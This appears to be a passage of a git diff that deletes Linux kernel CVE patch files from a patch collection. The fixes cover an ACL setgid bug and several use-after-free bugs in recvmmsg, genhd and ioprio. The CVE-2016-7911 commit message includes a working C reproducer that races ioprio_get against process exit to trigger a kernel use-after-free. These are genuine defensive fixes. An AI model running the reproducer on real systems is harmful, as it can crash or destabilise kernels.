- fs/hfsplus/posix_acl.c    |  4 ++--
- fs/jffs2/acl.c            |  9 ++++-----
- fs/jfs/acl.c              |  6 ++----
- fs/ocfs2/acl.c            | 10 ++++------
- fs/orangefs/acl.c         | 15 +++++----------
- fs/posix_acl.c            | 31 +++++++++++++++++++++++++++++++
- fs/reiserfs/xattr_acl.c   |  8 ++------
- fs/xfs/xfs_acl.c          | 13 ++++---------
- include/linux/posix_acl.h |  1 +
- 16 files changed, 89 insertions(+), 102 deletions(-)
-
-diff --git a/fs/9p/acl.c b/fs/9p/acl.c
-index 5b6a174..b3c2cc7 100644
---- a/fs/9p/acl.c
-+++ b/fs/9p/acl.c
-@@ -276,32 +276,26 @@ static int v9fs_xattr_set_acl(const struct xattr_handler *handler,
- 	switch (handler->flags) {
- 	case ACL_TYPE_ACCESS:
- 		if (acl) {
--			umode_t mode = inode->i_mode;
--			retval = posix_acl_equiv_mode(acl, &mode);
--			if (retval < 0)
-+			struct iattr iattr;
-+
-+			retval = posix_acl_update_mode(inode, &iattr.ia_mode, &acl);
-+			if (retval)
- 				goto err_out;
--			else {
--				struct iattr iattr;
--				if (retval == 0) {
--					/*
--					 * ACL can be represented
--					 * by the mode bits. So don't
--					 * update ACL.
--					 */
--					acl = NULL;
--					value = NULL;
--					size = 0;
--				}
--				/* Updte the mode bits */
--				iattr.ia_mode = ((mode & S_IALLUGO) |
--						 (inode->i_mode & ~S_IALLUGO));
--				iattr.ia_valid = ATTR_MODE;
--				/* FIXME should we update ctime ?
--				 * What is the following setxattr update the
--				 * mode ?
-+			if (!acl) {
-+				/*
-+				 * ACL can be represented
-+				 * by the mode bits. So don't
-+				 * update ACL.
- 				 */
--				v9fs_vfs_setattr_dotl(dentry, &iattr);
-+				value = NULL;
-+				size = 0;
- 			}
-+			iattr.ia_valid = ATTR_MODE;
-+			/* FIXME should we update ctime ?
-+			 * What is the following setxattr update the
-+			 * mode ?
-+			 */
-+			v9fs_vfs_setattr_dotl(dentry, &iattr);
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/btrfs/acl.c b/fs/btrfs/acl.c
-index 53bb7af..247b8df 100644
---- a/fs/btrfs/acl.c
-+++ b/fs/btrfs/acl.c
-@@ -79,11 +79,9 @@ static int __btrfs_set_acl(struct btrfs_trans_handle *trans,
- 	case ACL_TYPE_ACCESS:
- 		name = XATTR_NAME_POSIX_ACL_ACCESS;
- 		if (acl) {
--			ret = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (ret < 0)
-+			ret = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (ret)
- 				return ret;
--			if (ret == 0)
--				acl = NULL;
- 		}
- 		ret = 0;
- 		break;
-diff --git a/fs/ceph/acl.c b/fs/ceph/acl.c
-index 4f67227..d0b6b342 100644
---- a/fs/ceph/acl.c
-+++ b/fs/ceph/acl.c
-@@ -95,11 +95,9 @@ int ceph_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- 	case ACL_TYPE_ACCESS:
- 		name = XATTR_NAME_POSIX_ACL_ACCESS;
- 		if (acl) {
--			ret = posix_acl_equiv_mode(acl, &new_mode);
--			if (ret < 0)
-+			ret = posix_acl_update_mode(inode, &new_mode, &acl);
-+			if (ret)
- 				goto out;
--			if (ret == 0)
--				acl = NULL;
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/ext2/acl.c b/fs/ext2/acl.c
-index 42f1d18..e725aa0 100644
---- a/fs/ext2/acl.c
-+++ b/fs/ext2/acl.c
-@@ -190,15 +190,11 @@ ext2_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- 		case ACL_TYPE_ACCESS:
- 			name_index = EXT2_XATTR_INDEX_POSIX_ACL_ACCESS;
- 			if (acl) {
--				error = posix_acl_equiv_mode(acl, &inode->i_mode);
--				if (error < 0)
-+				error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+				if (error)
- 					return error;
--				else {
--					inode->i_ctime = CURRENT_TIME_SEC;
--					mark_inode_dirty(inode);
--					if (error == 0)
--						acl = NULL;
--				}
-+				inode->i_ctime = CURRENT_TIME_SEC;
-+				mark_inode_dirty(inode);
- 			}
- 			break;
- 
-diff --git a/fs/ext4/acl.c b/fs/ext4/acl.c
-index c6601a4..dfa5199 100644
---- a/fs/ext4/acl.c
-+++ b/fs/ext4/acl.c
-@@ -193,15 +193,11 @@ __ext4_set_acl(handle_t *handle, struct inode *inode, int type,
- 	case ACL_TYPE_ACCESS:
- 		name_index = EXT4_XATTR_INDEX_POSIX_ACL_ACCESS;
- 		if (acl) {
--			error = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (error < 0)
-+			error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (error)
- 				return error;
--			else {
--				inode->i_ctime = ext4_current_time(inode);
--				ext4_mark_inode_dirty(handle, inode);
--				if (error == 0)
--					acl = NULL;
--			}
-+			inode->i_ctime = ext4_current_time(inode);
-+			ext4_mark_inode_dirty(handle, inode);
- 		}
- 		break;
- 
-diff --git a/fs/f2fs/acl.c b/fs/f2fs/acl.c
-index 4dcc9e2..3134424 100644
---- a/fs/f2fs/acl.c
-+++ b/fs/f2fs/acl.c
-@@ -210,12 +210,10 @@ static int __f2fs_set_acl(struct inode *inode, int type,
- 	case ACL_TYPE_ACCESS:
- 		name_index = F2FS_XATTR_INDEX_POSIX_ACL_ACCESS;
- 		if (acl) {
--			error = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (error < 0)
-+			error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (error)
- 				return error;
- 			set_acl_inode(inode, inode->i_mode);
--			if (error == 0)
--				acl = NULL;
- 		}
- 		break;
- 
-diff --git a/fs/gfs2/acl.c b/fs/gfs2/acl.c
-index 363ba9e..2524807 100644
---- a/fs/gfs2/acl.c
-+++ b/fs/gfs2/acl.c
-@@ -92,17 +92,11 @@ int __gfs2_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- 	if (type == ACL_TYPE_ACCESS) {
- 		umode_t mode = inode->i_mode;
- 
--		error = posix_acl_equiv_mode(acl, &mode);
--		if (error < 0)
-+		error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+		if (error)
- 			return error;
--
--		if (error == 0)
--			acl = NULL;
--
--		if (mode != inode->i_mode) {
--			inode->i_mode = mode;
-+		if (mode != inode->i_mode)
- 			mark_inode_dirty(inode);
--		}
- 	}
- 
- 	if (acl) {
-diff --git a/fs/hfsplus/posix_acl.c b/fs/hfsplus/posix_acl.c
-index ab7ea25..9b92058 100644
---- a/fs/hfsplus/posix_acl.c
-+++ b/fs/hfsplus/posix_acl.c
-@@ -65,8 +65,8 @@ int hfsplus_set_posix_acl(struct inode *inode, struct posix_acl *acl,
- 	case ACL_TYPE_ACCESS:
- 		xattr_name = XATTR_NAME_POSIX_ACL_ACCESS;
- 		if (acl) {
--			err = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (err < 0)
-+			err = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (err)
- 				return err;
- 		}
- 		err = 0;
-diff --git a/fs/jffs2/acl.c b/fs/jffs2/acl.c
-index bc2693d..2a0f2a1 100644
---- a/fs/jffs2/acl.c
-+++ b/fs/jffs2/acl.c
-@@ -233,9 +233,10 @@ int jffs2_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- 	case ACL_TYPE_ACCESS:
- 		xprefix = JFFS2_XPREFIX_ACL_ACCESS;
- 		if (acl) {
--			umode_t mode = inode->i_mode;
--			rc = posix_acl_equiv_mode(acl, &mode);
--			if (rc < 0)
-+			umode_t mode;
-+
-+			rc = posix_acl_update_mode(inode, &mode, &acl);
-+			if (rc)
- 				return rc;
- 			if (inode->i_mode != mode) {
- 				struct iattr attr;
-@@ -247,8 +248,6 @@ int jffs2_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- 				if (rc < 0)
- 					return rc;
- 			}
--			if (rc == 0)
--				acl = NULL;
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/jfs/acl.c b/fs/jfs/acl.c
-index 21fa92b..3a1e155 100644
---- a/fs/jfs/acl.c
-+++ b/fs/jfs/acl.c
-@@ -78,13 +78,11 @@ static int __jfs_set_acl(tid_t tid, struct inode *inode, int type,
- 	case ACL_TYPE_ACCESS:
- 		ea_name = XATTR_NAME_POSIX_ACL_ACCESS;
- 		if (acl) {
--			rc = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (rc < 0)
-+			rc = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (rc)
- 				return rc;
- 			inode->i_ctime = CURRENT_TIME;
- 			mark_inode_dirty(inode);
--			if (rc == 0)
--				acl = NULL;
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/ocfs2/acl.c b/fs/ocfs2/acl.c
-index 2162434..164307b 100644
---- a/fs/ocfs2/acl.c
-+++ b/fs/ocfs2/acl.c
-@@ -241,13 +241,11 @@ int ocfs2_set_acl(handle_t *handle,
- 	case ACL_TYPE_ACCESS:
- 		name_index = OCFS2_XATTR_INDEX_POSIX_ACL_ACCESS;
- 		if (acl) {
--			umode_t mode = inode->i_mode;
--			ret = posix_acl_equiv_mode(acl, &mode);
--			if (ret < 0)
--				return ret;
-+			umode_t mode;
- 
--			if (ret == 0)
--				acl = NULL;
-+			ret = posix_acl_update_mode(inode, &mode, &acl);
-+			if (ret)
-+				return ret;
- 
- 			ret = ocfs2_acl_set_mode(inode, di_bh,
- 						 handle, mode);
-diff --git a/fs/orangefs/acl.c b/fs/orangefs/acl.c
-index 28f2195..7a37544 100644
---- a/fs/orangefs/acl.c
-+++ b/fs/orangefs/acl.c
-@@ -73,14 +73,11 @@ int orangefs_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- 	case ACL_TYPE_ACCESS:
- 		name = XATTR_NAME_POSIX_ACL_ACCESS;
- 		if (acl) {
--			umode_t mode = inode->i_mode;
--			/*
--			 * can we represent this with the traditional file
--			 * mode permission bits?
--			 */
--			error = posix_acl_equiv_mode(acl, &mode);
--			if (error < 0) {
--				gossip_err("%s: posix_acl_equiv_mode err: %d\n",
-+			umode_t mode;
-+
-+			error = posix_acl_update_mode(inode, &mode, &acl);
-+			if (error) {
-+				gossip_err("%s: posix_acl_update_mode err: %d\n",
- 					   __func__,
- 					   error);
- 				return error;
-@@ -90,8 +87,6 @@ int orangefs_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- 				SetModeFlag(orangefs_inode);
- 			inode->i_mode = mode;
- 			mark_inode_dirty_sync(inode);
--			if (error == 0)
--				acl = NULL;
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/posix_acl.c b/fs/posix_acl.c
-index 59d47ab0..bfc3ec3 100644
---- a/fs/posix_acl.c
-+++ b/fs/posix_acl.c
-@@ -626,6 +626,37 @@ no_mem:
- }
- EXPORT_SYMBOL_GPL(posix_acl_create);
- 
-+/**
-+ * posix_acl_update_mode  -  update mode in set_acl
-+ *
-+ * Update the file mode when setting an ACL: compute the new file permission
-+ * bits based on the ACL.  In addition, if the ACL is equivalent to the new
-+ * file mode, set *acl to NULL to indicate that no ACL should be set.
-+ *
-+ * As with chmod, clear the setgit bit if the caller is not in the owning group
-+ * or capable of CAP_FSETID (see inode_change_ok).
-+ *
-+ * Called from set_acl inode operations.
-+ */
-+int posix_acl_update_mode(struct inode *inode, umode_t *mode_p,
-+			  struct posix_acl **acl)
-+{
-+	umode_t mode = inode->i_mode;
-+	int error;
-+
-+	error = posix_acl_equiv_mode(*acl, &mode);
-+	if (error < 0)
-+		return error;
-+	if (error == 0)
-+		*acl = NULL;
-+	if (!in_group_p(inode->i_gid) &&
-+	    !capable_wrt_inode_uidgid(inode, CAP_FSETID))
-+		mode &= ~S_ISGID;
-+	*mode_p = mode;
-+	return 0;
-+}
-+EXPORT_SYMBOL(posix_acl_update_mode);
-+
- /*
-  * Fix up the uids and gids in posix acl extended attributes in place.
-  */
-diff --git a/fs/reiserfs/xattr_acl.c b/fs/reiserfs/xattr_acl.c
-index dbed42f..2737668 100644
---- a/fs/reiserfs/xattr_acl.c
-+++ b/fs/reiserfs/xattr_acl.c
-@@ -242,13 +242,9 @@ __reiserfs_set_acl(struct reiserfs_transaction_handle *th, struct inode *inode,
- 	case ACL_TYPE_ACCESS:
- 		name = XATTR_NAME_POSIX_ACL_ACCESS;
- 		if (acl) {
--			error = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (error < 0)
-+			error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (error)
- 				return error;
--			else {
--				if (error == 0)
--					acl = NULL;
--			}
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/xfs/xfs_acl.c b/fs/xfs/xfs_acl.c
-index b6e527b..8a0dec8 100644
---- a/fs/xfs/xfs_acl.c
-+++ b/fs/xfs/xfs_acl.c
-@@ -257,16 +257,11 @@ xfs_set_acl(struct inode *inode, struct posix_acl *acl, int type)
- 		return error;
- 
- 	if (type == ACL_TYPE_ACCESS) {
--		umode_t mode = inode->i_mode;
--		error = posix_acl_equiv_mode(acl, &mode);
--
--		if (error <= 0) {
--			acl = NULL;
--
--			if (error < 0)
--				return error;
--		}
-+		umode_t mode;
- 
-+		error = posix_acl_update_mode(inode, &mode, &acl);
-+		if (error)
-+			return error;
- 		error = xfs_set_mode(inode, mode);
- 		if (error)
- 			return error;
-diff --git a/include/linux/posix_acl.h b/include/linux/posix_acl.h
-index d5d3d74..bf1046d 100644
---- a/include/linux/posix_acl.h
-+++ b/include/linux/posix_acl.h
-@@ -93,6 +93,7 @@ extern int set_posix_acl(struct inode *, int, struct posix_acl *);
- extern int posix_acl_chmod(struct inode *, umode_t);
- extern int posix_acl_create(struct inode *, umode_t *, struct posix_acl **,
- 		struct posix_acl **);
-+extern int posix_acl_update_mode(struct inode *, umode_t *, struct posix_acl **);
- 
- extern int simple_set_acl(struct inode *, struct posix_acl *, int);
- extern int simple_acl_create(struct inode *, struct inode *);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0001.patch b/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0001.patch
deleted file mode 100644
index 0d30b687..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 34b88a68f26a75e4fded796f1a49c40f82234b7d Mon Sep 17 00:00:00 2001
-From: Arnaldo Carvalho de Melo <acme@redhat.com>
-Date: Mon, 14 Mar 2016 09:56:35 -0300
-Subject: net: Fix use after free in the recvmmsg exit path
-
-The syzkaller fuzzer hit the following use-after-free:
-
-  Call Trace:
-   [<ffffffff8175ea0e>] __asan_report_load8_noabort+0x3e/0x40 mm/kasan/report.c:295
-   [<ffffffff851cc31a>] __sys_recvmmsg+0x6fa/0x7f0 net/socket.c:2261
-   [<     inline     >] SYSC_recvmmsg net/socket.c:2281
-   [<ffffffff851cc57f>] SyS_recvmmsg+0x16f/0x180 net/socket.c:2270
-   [<ffffffff86332bb6>] entry_SYSCALL_64_fastpath+0x16/0x7a
-  arch/x86/entry/entry_64.S:185
-
-And, as Dmitry rightly assessed, that is because we can drop the
-reference and then touch it when the underlying recvmsg calls return
-some packets and then hit an error, which will make recvmmsg to set
-sock->sk->sk_err, oops, fix it.
-
-Reported-and-Tested-by: Dmitry Vyukov <dvyukov@google.com>
-Cc: Alexander Potapenko <glider@google.com>
-Cc: Eric Dumazet <edumazet@google.com>
-Cc: Kostya Serebryany <kcc@google.com>
-Cc: Sasha Levin <sasha.levin@oracle.com>
-Fixes: a2e2725541fa ("net: Introduce recvmmsg socket syscall")
-http://lkml.kernel.org/r/20160122211644.GC2470@redhat.com
-Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/socket.c | 38 +++++++++++++++++++-------------------
- 1 file changed, 19 insertions(+), 19 deletions(-)
-
-diff --git a/net/socket.c b/net/socket.c
-index c5ddc52..5f77a8e 100644
---- a/net/socket.c
-+++ b/net/socket.c
-@@ -2244,31 +2244,31 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
- 		cond_resched();
- 	}
- 
--out_put:
--	fput_light(sock->file, fput_needed);
--
- 	if (err == 0)
--		return datagrams;
-+		goto out_put;
- 
--	if (datagrams != 0) {
-+	if (datagrams == 0) {
-+		datagrams = err;
-+		goto out_put;
-+	}
-+
-+	/*
-+	 * We may return less entries than requested (vlen) if the
-+	 * sock is non block and there aren't enough datagrams...
-+	 */
-+	if (err != -EAGAIN) {
- 		/*
--		 * We may return less entries than requested (vlen) if the
--		 * sock is non block and there aren't enough datagrams...
-+		 * ... or  if recvmsg returns an error after we
-+		 * received some datagrams, where we record the
-+		 * error to return on the next call or if the
-+		 * app asks about it using getsockopt(SO_ERROR).
- 		 */
--		if (err != -EAGAIN) {
--			/*
--			 * ... or  if recvmsg returns an error after we
--			 * received some datagrams, where we record the
--			 * error to return on the next call or if the
--			 * app asks about it using getsockopt(SO_ERROR).
--			 */
--			sock->sk->sk_err = -err;
--		}
--
--		return datagrams;
-+		sock->sk->sk_err = -err;
- 	}
-+out_put:
-+	fput_light(sock->file, fput_needed);
- 
--	return err;
-+	return datagrams;
- }
- 
- SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0002.patch b/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0002.patch
deleted file mode 100644
index d4abc30f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7117/^4.5/0002.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 0b5240c45e2029986526b1405ab24906c708f770 Mon Sep 17 00:00:00 2001
-From: Maxime Jayat <maxime.jayat@mobile-devices.fr>
-Date: Tue, 21 Feb 2017 18:35:51 +0100
-Subject: net: socket: fix recvmmsg not returning error from sock_error
-
-commit e623a9e9dec29ae811d11f83d0074ba254aba374 upstream.
-
-Commit 34b88a68f26a ("net: Fix use after free in the recvmmsg exit path"),
-changed the exit path of recvmmsg to always return the datagrams
-variable and modified the error paths to set the variable to the error
-code returned by recvmsg if necessary.
-
-However in the case sock_error returned an error, the error code was
-then ignored, and recvmmsg returned 0.
-
-Change the error path of recvmmsg to correctly return the error code
-of sock_error.
-
-The bug was triggered by using recvmmsg on a CAN interface which was
-not up. Linux 4.6 and later return 0 in this case while earlier
-releases returned -ENETDOWN.
-
-Fixes: 34b88a68f26a ("net: Fix use after free in the recvmmsg exit path")
-Signed-off-by: Maxime Jayat <maxime.jayat@mobile-devices.fr>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
- net/socket.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/net/socket.c b/net/socket.c
-index e91e8ed..773ba3a 100644
---- a/net/socket.c
-+++ b/net/socket.c
-@@ -2326,8 +2326,10 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
- 		return err;
- 
- 	err = sock_error(sock->sk);
--	if (err)
-+	if (err) {
-+		datagrams = err;
- 		goto out_put;
-+	}
- 
- 	entry = mmsg;
- 	compat_entry = (struct compat_mmsghdr __user *)mmsg;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7910/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7910/ANY/0001.patch
deleted file mode 100644
index 995fc458..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7910/ANY/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@
-From 77da160530dd1dc94f6ae15a981f24e5f0021e84 Mon Sep 17 00:00:00 2001
-From: Vegard Nossum <vegard.nossum@oracle.com>
-Date: Fri, 29 Jul 2016 10:40:31 +0200
-Subject: block: fix use-after-free in seq file
-
-I got a KASAN report of use-after-free:
-
-    ==================================================================
-    BUG: KASAN: use-after-free in klist_iter_exit+0x61/0x70 at addr ffff8800b6581508
-    Read of size 8 by task trinity-c1/315
-    =============================================================================
-    BUG kmalloc-32 (Not tainted): kasan: bad access detected
-    -----------------------------------------------------------------------------
-
-    Disabling lock debugging due to kernel taint
-    INFO: Allocated in disk_seqf_start+0x66/0x110 age=144 cpu=1 pid=315
-            ___slab_alloc+0x4f1/0x520
-            __slab_alloc.isra.58+0x56/0x80
-            kmem_cache_alloc_trace+0x260/0x2a0
-            disk_seqf_start+0x66/0x110
-            traverse+0x176/0x860
-            seq_read+0x7e3/0x11a0
-            proc_reg_read+0xbc/0x180
-            do_loop_readv_writev+0x134/0x210
-            do_readv_writev+0x565/0x660
-            vfs_readv+0x67/0xa0
-            do_preadv+0x126/0x170
-            SyS_preadv+0xc/0x10
-            do_syscall_64+0x1a1/0x460
-            return_from_SYSCALL_64+0x0/0x6a
-    INFO: Freed in disk_seqf_stop+0x42/0x50 age=160 cpu=1 pid=315
-            __slab_free+0x17a/0x2c0
-            kfree+0x20a/0x220
-            disk_seqf_stop+0x42/0x50
-            traverse+0x3b5/0x860
-            seq_read+0x7e3/0x11a0
-            proc_reg_read+0xbc/0x180
-            do_loop_readv_writev+0x134/0x210
-            do_readv_writev+0x565/0x660
-            vfs_readv+0x67/0xa0
-            do_preadv+0x126/0x170
-            SyS_preadv+0xc/0x10
-            do_syscall_64+0x1a1/0x460
-            return_from_SYSCALL_64+0x0/0x6a
-
-    CPU: 1 PID: 315 Comm: trinity-c1 Tainted: G    B           4.7.0+ #62
-    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
-     ffffea0002d96000 ffff880119b9f918 ffffffff81d6ce81 ffff88011a804480
-     ffff8800b6581500 ffff880119b9f948 ffffffff8146c7bd ffff88011a804480
-     ffffea0002d96000 ffff8800b6581500 fffffffffffffff4 ffff880119b9f970
-    Call Trace:
-     [<ffffffff81d6ce81>] dump_stack+0x65/0x84
-     [<ffffffff8146c7bd>] print_trailer+0x10d/0x1a0
-     [<ffffffff814704ff>] object_err+0x2f/0x40
-     [<ffffffff814754d1>] kasan_report_error+0x221/0x520
-     [<ffffffff8147590e>] __asan_report_load8_noabort+0x3e/0x40
-     [<ffffffff83888161>] klist_iter_exit+0x61/0x70
-     [<ffffffff82404389>] class_dev_iter_exit+0x9/0x10
-     [<ffffffff81d2e8ea>] disk_seqf_stop+0x3a/0x50
-     [<ffffffff8151f812>] seq_read+0x4b2/0x11a0
-     [<ffffffff815f8fdc>] proc_reg_read+0xbc/0x180
-     [<ffffffff814b24e4>] do_loop_readv_writev+0x134/0x210
-     [<ffffffff814b4c45>] do_readv_writev+0x565/0x660
-     [<ffffffff814b8a17>] vfs_readv+0x67/0xa0
-     [<ffffffff814b8de6>] do_preadv+0x126/0x170
-     [<ffffffff814b92ec>] SyS_preadv+0xc/0x10
-
-This problem can occur in the following situation:
-
-open()
- - pread()
-    - .seq_start()
-       - iter = kmalloc() // succeeds
-       - seqf->private = iter
-    - .seq_stop()
-       - kfree(seqf->private)
- - pread()
-    - .seq_start()
-       - iter = kmalloc() // fails
-    - .seq_stop()
-       - class_dev_iter_exit(seqf->private) // boom! old pointer
-
-As the comment in disk_seqf_stop() says, stop is called even if start
-failed, so we need to reinitialise the private pointer to NULL when seq
-iteration stops.
-
-An alternative would be to set the private pointer to NULL when the
-kmalloc() in disk_seqf_start() fails.
-
-Cc: stable@vger.kernel.org
-Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
-Acked-by: Tejun Heo <tj@kernel.org>
-Signed-off-by: Jens Axboe <axboe@fb.com>
----
- block/genhd.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/block/genhd.c b/block/genhd.c
-index 3c9dede..0ad8796 100644
---- a/block/genhd.c
-+++ b/block/genhd.c
-@@ -856,6 +856,7 @@ static void disk_seqf_stop(struct seq_file *seqf, void *v)
- 	if (iter) {
- 		class_dev_iter_exit(iter);
- 		kfree(iter);
-+		seqf->private = NULL;
- 	}
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7911/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7911/ANY/0001.patch
deleted file mode 100644
index 99e2ddff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7911/ANY/0001.patch
+++ /dev/null
@@ -1,123 +0,0 @@
-From 8ba8682107ee2ca3347354e018865d8e1967c5f4 Mon Sep 17 00:00:00 2001
-From: Omar Sandoval <osandov@fb.com>
-Date: Fri, 1 Jul 2016 00:39:35 -0700
-Subject: block: fix use-after-free in sys_ioprio_get()
-
-get_task_ioprio() accesses the task->io_context without holding the task
-lock and thus can race with exit_io_context(), leading to a
-use-after-free. The reproducer below hits this within a few seconds on
-my 4-core QEMU VM:
-
-#define _GNU_SOURCE
-#include <assert.h>
-#include <unistd.h>
-#include <sys/syscall.h>
-#include <sys/wait.h>
-
-int main(int argc, char **argv)
-{
-	pid_t pid, child;
-	long nproc, i;
-
-	/* ioprio_set(IOPRIO_WHO_PROCESS, 0, IOPRIO_PRIO_VALUE(IOPRIO_CLASS_IDLE, 0)); */
-	syscall(SYS_ioprio_set, 1, 0, 0x6000);
-
-	nproc = sysconf(_SC_NPROCESSORS_ONLN);
-
-	for (i = 0; i < nproc; i++) {
-		pid = fork();
-		assert(pid != -1);
-		if (pid == 0) {
-			for (;;) {
-				pid = fork();
-				assert(pid != -1);
-				if (pid == 0) {
-					_exit(0);
-				} else {
-					child = wait(NULL);
-					assert(child == pid);
-				}
-			}
-		}
-
-		pid = fork();
-		assert(pid != -1);
-		if (pid == 0) {
-			for (;;) {
-				/* ioprio_get(IOPRIO_WHO_PGRP, 0); */
-				syscall(SYS_ioprio_get, 2, 0);
-			}
-		}
-	}
-
-	for (;;) {
-		/* ioprio_get(IOPRIO_WHO_PGRP, 0); */
-		syscall(SYS_ioprio_get, 2, 0);
-	}
-
-	return 0;
-}
-
-This gets us KASAN dumps like this:
-
-[   35.526914] ==================================================================
-[   35.530009] BUG: KASAN: out-of-bounds in get_task_ioprio+0x7b/0x90 at addr ffff880066f34e6c
-[   35.530009] Read of size 2 by task ioprio-gpf/363
-[   35.530009] =============================================================================
-[   35.530009] BUG blkdev_ioc (Not tainted): kasan: bad access detected
-[   35.530009] -----------------------------------------------------------------------------
-
-[   35.530009] Disabling lock debugging due to kernel taint
-[   35.530009] INFO: Allocated in create_task_io_context+0x2b/0x370 age=0 cpu=0 pid=360
-[   35.530009] 	___slab_alloc+0x55d/0x5a0
-[   35.530009] 	__slab_alloc.isra.20+0x2b/0x40
-[   35.530009] 	kmem_cache_alloc_node+0x84/0x200
-[   35.530009] 	create_task_io_context+0x2b/0x370
-[   35.530009] 	get_task_io_context+0x92/0xb0
-[   35.530009] 	copy_process.part.8+0x5029/0x5660
-[   35.530009] 	_do_fork+0x155/0x7e0
-[   35.530009] 	SyS_clone+0x19/0x20
-[   35.530009] 	do_syscall_64+0x195/0x3a0
-[   35.530009] 	return_from_SYSCALL_64+0x0/0x6a
-[   35.530009] INFO: Freed in put_io_context+0xe7/0x120 age=0 cpu=0 pid=1060
-[   35.530009] 	__slab_free+0x27b/0x3d0
-[   35.530009] 	kmem_cache_free+0x1fb/0x220
-[   35.530009] 	put_io_context+0xe7/0x120
-[   35.530009] 	put_io_context_active+0x238/0x380
-[   35.530009] 	exit_io_context+0x66/0x80
-[   35.530009] 	do_exit+0x158e/0x2b90
-[   35.530009] 	do_group_exit+0xe5/0x2b0
-[   35.530009] 	SyS_exit_group+0x1d/0x20
-[   35.530009] 	entry_SYSCALL_64_fastpath+0x1a/0xa4
-[   35.530009] INFO: Slab 0xffffea00019bcd00 objects=20 used=4 fp=0xffff880066f34ff0 flags=0x1fffe0000004080
-[   35.530009] INFO: Object 0xffff880066f34e58 @offset=3672 fp=0x0000000000000001
-[   35.530009] ==================================================================
-
-Fix it by grabbing the task lock while we poke at the io_context.
-
-Cc: stable@vger.kernel.org
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Signed-off-by: Omar Sandoval <osandov@fb.com>
-Signed-off-by: Jens Axboe <axboe@fb.com>
----
- block/ioprio.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/block/ioprio.c b/block/ioprio.c
-index cc7800e..01b8116 100644
---- a/block/ioprio.c
-+++ b/block/ioprio.c
-@@ -150,8 +150,10 @@ static int get_task_ioprio(struct task_struct *p)
- 	if (ret)
- 		goto out;
- 	ret = IOPRIO_PRIO_VALUE(IOPRIO_CLASS_NONE, IOPRIO_NORM);
-+	task_lock(p);
- 	if (p->io_context)
- 		ret = p->io_context->ioprio;
-+	task_unlock(p);
- out:
- 	return ret;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7912/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7912/ANY/0001.patch
deleted file mode 100644
index 03c5bdbe..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7912/ANY/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 38740a5b87d53ceb89eb2c970150f6e94e00373a Mon Sep 17 00:00:00 2001
-From: Lars-Peter Clausen <lars@metafoo.de>
-Date: Thu, 14 Apr 2016 17:01:17 +0200
-Subject: usb: gadget: f_fs: Fix use-after-free
-
-When using asynchronous read or write operations on the USB endpoints the
-issuer of the IO request is notified by calling the ki_complete() callback
-of the submitted kiocb when the URB has been completed.
-
-Calling this ki_complete() callback will free kiocb. Make sure that the
